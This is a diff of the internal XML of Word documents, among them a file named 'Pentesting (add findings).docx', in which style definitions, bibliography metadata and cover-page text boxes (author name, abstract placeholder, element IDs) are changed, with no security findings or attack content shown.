+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B24C54"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -476,6 +1931,91 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B24C54"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NoSpacing">
+    <w:name w:val="No Spacing"/>
+    <w:link w:val="NoSpacingChar"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B24C54"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
+    <w:name w:val="No Spacing Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="NoSpacing"/>
+    <w:uiPriority w:val="1"/>
+    <w:rsid w:val="00B24C54"/>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B24C54"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOCHeading">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="Heading1"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B24C54"/>
+    <w:pPr>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B24C54"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B24C54"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -739,4 +2279,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{16BA9E90-FB82-46C0-8D8C-86169E278E1B}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Documentation/Pentesting (add findings).docx
+++ b/Documentation/Pentesting (add findings).docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:body>
     <w:sdt>
       <w:sdtPr>
@@ -10,6 +10,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:r>
@@ -287,249 +288,7 @@
             <mc:AlternateContent>
               <mc:Choice Requires="wps">
                 <w:drawing>
-                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-                    <wp:simplePos x="0" y="0"/>
-                    <wp:positionH relativeFrom="page">
-                      <wp:align>center</wp:align>
-                    </wp:positionH>
-                    <mc:AlternateContent>
-                      <mc:Choice Requires="wp14">
-                        <wp:positionV relativeFrom="page">
-                          <wp14:pctPosVOffset>81800</wp14:pctPosVOffset>
-                        </wp:positionV>
-                      </mc:Choice>
-                      <mc:Fallback>
-                        <wp:positionV relativeFrom="page">
-                          <wp:posOffset>8227695</wp:posOffset>
-                        </wp:positionV>
-                      </mc:Fallback>
-                    </mc:AlternateContent>
-                    <wp:extent cx="7315200" cy="914400"/>
-                    <wp:effectExtent l="0" t="0" r="0" b="8255"/>
-                    <wp:wrapSquare wrapText="bothSides"/>
-                    <wp:docPr id="152" name="Text Box 152"/>
-                    <wp:cNvGraphicFramePr/>
-                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                        <wps:wsp>
-                          <wps:cNvSpPr txBox="1"/>
-                          <wps:spPr>
-                            <a:xfrm>
-                              <a:off x="0" y="0"/>
-                              <a:ext cx="7315200" cy="914400"/>
-                            </a:xfrm>
-                            <a:prstGeom prst="rect">
-                              <a:avLst/>
-                            </a:prstGeom>
-                            <a:noFill/>
-                            <a:ln w="6350">
-                              <a:noFill/>
-                            </a:ln>
-                            <a:effectLst/>
-                          </wps:spPr>
-                          <wps:style>
-                            <a:lnRef idx="0">
-                              <a:schemeClr val="accent1"/>
-                            </a:lnRef>
-                            <a:fillRef idx="0">
-                              <a:schemeClr val="accent1"/>
-                            </a:fillRef>
-                            <a:effectRef idx="0">
-                              <a:schemeClr val="accent1"/>
-                            </a:effectRef>
-                            <a:fontRef idx="minor">
-                              <a:schemeClr val="dk1"/>
-                            </a:fontRef>
-                          </wps:style>
-                          <wps:txbx>
-                            <w:txbxContent>
-                              <w:sdt>
-                                <w:sdtPr>
-                                  <w:rPr>
-                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:alias w:val="Author"/>
-                                  <w:tag w:val=""/>
-                                  <w:id w:val="789243997"/>
-                                  <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
-                                  <w:text/>
-                                </w:sdtPr>
-                                <w:sdtContent>
-                                  <w:p>
-                                    <w:pPr>
-                                      <w:pStyle w:val="NoSpacing"/>
-                                      <w:jc w:val="right"/>
-                                      <w:rPr>
-                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                        <w:sz w:val="28"/>
-                                        <w:szCs w:val="28"/>
-                                      </w:rPr>
-                                    </w:pPr>
-                                    <w:r>
-                                      <w:rPr>
-                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                        <w:sz w:val="28"/>
-                                        <w:szCs w:val="28"/>
-                                      </w:rPr>
-                                      <w:t xml:space="preserve">Georgiana Manolache </w:t>
-                                    </w:r>
-                                  </w:p>
-                                </w:sdtContent>
-                              </w:sdt>
-                              <w:p>
-                                <w:pPr>
-                                  <w:pStyle w:val="NoSpacing"/>
-                                  <w:jc w:val="right"/>
-                                  <w:rPr>
-                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                    <w:sz w:val="18"/>
-                                    <w:szCs w:val="18"/>
-                                  </w:rPr>
-                                </w:pPr>
-                                <w:sdt>
-                                  <w:sdtPr>
-                                    <w:rPr>
-                                      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                      <w:sz w:val="18"/>
-                                      <w:szCs w:val="18"/>
-                                    </w:rPr>
-                                    <w:alias w:val="Email"/>
-                                    <w:tag w:val="Email"/>
-                                    <w:id w:val="942260680"/>
-                                    <w:showingPlcHdr/>
-                                    <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyEmail[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                                    <w:text/>
-                                  </w:sdtPr>
-                                  <w:sdtContent>
-                                    <w:r>
-                                      <w:rPr>
-                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                        <w:sz w:val="18"/>
-                                        <w:szCs w:val="18"/>
-                                      </w:rPr>
-                                      <w:t xml:space="preserve">     </w:t>
-                                    </w:r>
-                                  </w:sdtContent>
-                                </w:sdt>
-                              </w:p>
-                            </w:txbxContent>
-                          </wps:txbx>
-                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="1600200" tIns="0" rIns="685800" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
-                            <a:prstTxWarp prst="textNoShape">
-                              <a:avLst/>
-                            </a:prstTxWarp>
-                            <a:noAutofit/>
-                          </wps:bodyPr>
-                        </wps:wsp>
-                      </a:graphicData>
-                    </a:graphic>
-                    <wp14:sizeRelH relativeFrom="page">
-                      <wp14:pctWidth>94100</wp14:pctWidth>
-                    </wp14:sizeRelH>
-                    <wp14:sizeRelV relativeFrom="page">
-                      <wp14:pctHeight>9200</wp14:pctHeight>
-                    </wp14:sizeRelV>
-                  </wp:anchor>
-                </w:drawing>
-              </mc:Choice>
-              <mc:Fallback>
-                <w:pict>
-                  <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                    <v:stroke joinstyle="miter"/>
-                    <v:path gradientshapeok="t" o:connecttype="rect"/>
-                  </v:shapetype>
-                  <v:shape id="Text Box 152" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:1in;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:92;mso-top-percent:818;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:92;mso-top-percent:818;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
-                    <v:textbox inset="126pt,0,54pt,0">
-                      <w:txbxContent>
-                        <w:sdt>
-                          <w:sdtPr>
-                            <w:rPr>
-                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                              <w:sz w:val="28"/>
-                              <w:szCs w:val="28"/>
-                            </w:rPr>
-                            <w:alias w:val="Author"/>
-                            <w:tag w:val=""/>
-                            <w:id w:val="789243997"/>
-                            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
-                            <w:text/>
-                          </w:sdtPr>
-                          <w:sdtContent>
-                            <w:p>
-                              <w:pPr>
-                                <w:pStyle w:val="NoSpacing"/>
-                                <w:jc w:val="right"/>
-                                <w:rPr>
-                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                  <w:sz w:val="28"/>
-                                  <w:szCs w:val="28"/>
-                                </w:rPr>
-                              </w:pPr>
-                              <w:r>
-                                <w:rPr>
-                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                  <w:sz w:val="28"/>
-                                  <w:szCs w:val="28"/>
-                                </w:rPr>
-                                <w:t xml:space="preserve">Georgiana Manolache </w:t>
-                              </w:r>
-                            </w:p>
-                          </w:sdtContent>
-                        </w:sdt>
-                        <w:p>
-                          <w:pPr>
-                            <w:pStyle w:val="NoSpacing"/>
-                            <w:jc w:val="right"/>
-                            <w:rPr>
-                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                              <w:sz w:val="18"/>
-                              <w:szCs w:val="18"/>
-                            </w:rPr>
-                          </w:pPr>
-                          <w:sdt>
-                            <w:sdtPr>
-                              <w:rPr>
-                                <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                <w:sz w:val="18"/>
-                                <w:szCs w:val="18"/>
-                              </w:rPr>
-                              <w:alias w:val="Email"/>
-                              <w:tag w:val="Email"/>
-                              <w:id w:val="942260680"/>
-                              <w:showingPlcHdr/>
-                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyEmail[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                              <w:text/>
-                            </w:sdtPr>
-                            <w:sdtContent>
-                              <w:r>
-                                <w:rPr>
-                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                  <w:sz w:val="18"/>
-                                  <w:szCs w:val="18"/>
-                                </w:rPr>
-                                <w:t xml:space="preserve">     </w:t>
-                              </w:r>
-                            </w:sdtContent>
-                          </w:sdt>
-                        </w:p>
-                      </w:txbxContent>
-                    </v:textbox>
-                    <w10:wrap type="square" anchorx="page" anchory="page"/>
-                  </v:shape>
-                </w:pict>
-              </mc:Fallback>
-            </mc:AlternateContent>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-            <mc:AlternateContent>
-              <mc:Choice Requires="wps">
-                <w:drawing>
-                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68CCD3D2" wp14:editId="14E716F4">
                     <wp:simplePos x="0" y="0"/>
                     <wp:positionH relativeFrom="page">
                       <wp:align>center</wp:align>
@@ -585,25 +344,6 @@
                           </wps:style>
                           <wps:txbx>
                             <w:txbxContent>
-                              <w:p>
-                                <w:pPr>
-                                  <w:pStyle w:val="NoSpacing"/>
-                                  <w:jc w:val="right"/>
-                                  <w:rPr>
-                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                </w:pPr>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:t>Abstract</w:t>
-                                </w:r>
-                              </w:p>
                               <w:sdt>
                                 <w:sdtPr>
                                   <w:rPr>
@@ -613,11 +353,12 @@
                                   </w:rPr>
                                   <w:alias w:val="Abstract"/>
                                   <w:tag w:val=""/>
-                                  <w:id w:val="1375273687"/>
+                                  <w:id w:val="1000625759"/>
                                   <w:showingPlcHdr/>
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                   <w:text w:multiLine="1"/>
                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -635,16 +376,7 @@
                                         <w:sz w:val="20"/>
                                         <w:szCs w:val="20"/>
                                       </w:rPr>
-                                      <w:t xml:space="preserve">[Draw your reader in with an engaging abstract. It is typically a short summary of the document. </w:t>
-                                    </w:r>
-                                    <w:r>
-                                      <w:rPr>
-                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                        <w:sz w:val="20"/>
-                                        <w:szCs w:val="20"/>
-                                      </w:rPr>
-                                      <w:br/>
-                                      <w:t>When you’re ready to add your content, just click here and start typing.]</w:t>
+                                      <w:t xml:space="preserve">     </w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -671,28 +403,13 @@
               </mc:Choice>
               <mc:Fallback>
                 <w:pict>
-                  <v:shape id="Text Box 153" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:79.5pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                  <v:shapetype w14:anchorId="68CCD3D2" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                    <v:stroke joinstyle="miter"/>
+                    <v:path gradientshapeok="t" o:connecttype="rect"/>
+                  </v:shapetype>
+                  <v:shape id="Text Box 153" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:79.5pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
                     <v:textbox style="mso-fit-shape-to-text:t" inset="126pt,0,54pt,0">
                       <w:txbxContent>
-                        <w:p>
-                          <w:pPr>
-                            <w:pStyle w:val="NoSpacing"/>
-                            <w:jc w:val="right"/>
-                            <w:rPr>
-                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-                              <w:sz w:val="28"/>
-                              <w:szCs w:val="28"/>
-                            </w:rPr>
-                          </w:pPr>
-                          <w:r>
-                            <w:rPr>
-                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-                              <w:sz w:val="28"/>
-                              <w:szCs w:val="28"/>
-                            </w:rPr>
-                            <w:t>Abstract</w:t>
-                          </w:r>
-                        </w:p>
                         <w:sdt>
                           <w:sdtPr>
                             <w:rPr>
@@ -702,11 +419,12 @@
                             </w:rPr>
                             <w:alias w:val="Abstract"/>
                             <w:tag w:val=""/>
-                            <w:id w:val="1375273687"/>
+                            <w:id w:val="1000625759"/>
                             <w:showingPlcHdr/>
                             <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                             <w:text w:multiLine="1"/>
                           </w:sdtPr>
+                          <w:sdtEndPr/>
                           <w:sdtContent>
                             <w:p>
                               <w:pPr>
@@ -724,16 +442,7 @@
                                   <w:sz w:val="20"/>
                                   <w:szCs w:val="20"/>
                                 </w:rPr>
-                                <w:t xml:space="preserve">[Draw your reader in with an engaging abstract. It is typically a short summary of the document. </w:t>
-                              </w:r>
-                              <w:r>
-                                <w:rPr>
-                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
-                                  <w:sz w:val="20"/>
-                                  <w:szCs w:val="20"/>
-                                </w:rPr>
-                                <w:br/>
-                                <w:t>When you’re ready to add your content, just click here and start typing.]</w:t>
+                                <w:t xml:space="preserve">     </w:t>
                               </w:r>
                             </w:p>
                           </w:sdtContent>
@@ -753,7 +462,7 @@
             <mc:AlternateContent>
               <mc:Choice Requires="wps">
                 <w:drawing>
-                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00684531" wp14:editId="3B332545">
                     <wp:simplePos x="0" y="0"/>
                     <wp:positionH relativeFrom="page">
                       <wp:align>center</wp:align>
@@ -828,7 +537,7 @@
                                     </w:rPr>
                                     <w:alias w:val="Title"/>
                                     <w:tag w:val=""/>
-                                    <w:id w:val="630141079"/>
+                                    <w:id w:val="-645821955"/>
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                     <w:text w:multiLine="1"/>
                                   </w:sdtPr>
@@ -859,10 +568,11 @@
                                   </w:rPr>
                                   <w:alias w:val="Subtitle"/>
                                   <w:tag w:val=""/>
-                                  <w:id w:val="1759551507"/>
+                                  <w:id w:val="104554726"/>
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -907,7 +617,7 @@
               </mc:Choice>
               <mc:Fallback>
                 <w:pict>
-                  <v:shape id="Text Box 154" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:286.5pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                  <v:shape w14:anchorId="00684531" id="Text Box 154" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:286.5pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
                     <v:textbox inset="126pt,0,54pt,0">
                       <w:txbxContent>
                         <w:p>
@@ -929,7 +639,7 @@
                               </w:rPr>
                               <w:alias w:val="Title"/>
                               <w:tag w:val=""/>
-                              <w:id w:val="630141079"/>
+                              <w:id w:val="-645821955"/>
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                               <w:text w:multiLine="1"/>
                             </w:sdtPr>
@@ -960,10 +670,11 @@
                             </w:rPr>
                             <w:alias w:val="Subtitle"/>
                             <w:tag w:val=""/>
-                            <w:id w:val="1759551507"/>
+                            <w:id w:val="104554726"/>
